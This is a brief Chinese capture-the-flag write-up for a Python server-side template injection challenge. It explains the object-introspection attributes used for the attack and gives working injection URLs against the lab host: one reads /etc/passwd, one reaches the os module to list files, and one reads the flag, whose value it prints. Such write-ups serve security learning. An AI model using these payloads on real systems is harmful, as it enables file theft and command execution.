攻防世界-Web_python_template_injection

打开发现是python的模板注入（根据提示可以判定）

先判断有无模板注入，

发现有模板注入，查看全局变量。

主要是通过文件读取和命令执行实现的。接着找到父类<type ‘object’>、寻找子类、找关于命令执行或者文件操作的模块。

__class__:返回类型所属的对象
__mro__ :返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。
__base__:返回该对象所继承的基类  // __base__和__mro__都是用来寻找基类的

__subclasses__:每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表
__init__:类的初始化方法
__globals__:对包含函数全局变量的字典的引用

http://61.147.171.105:58593/{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

看到type file类型的文件，即可进行文件读取。

看到class"site.printer"类型的文件，即可进行命令读取，

http://61.147.171.105:58593/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

http://61.147.171.105:58593/{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

即可拿到flag的值。

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}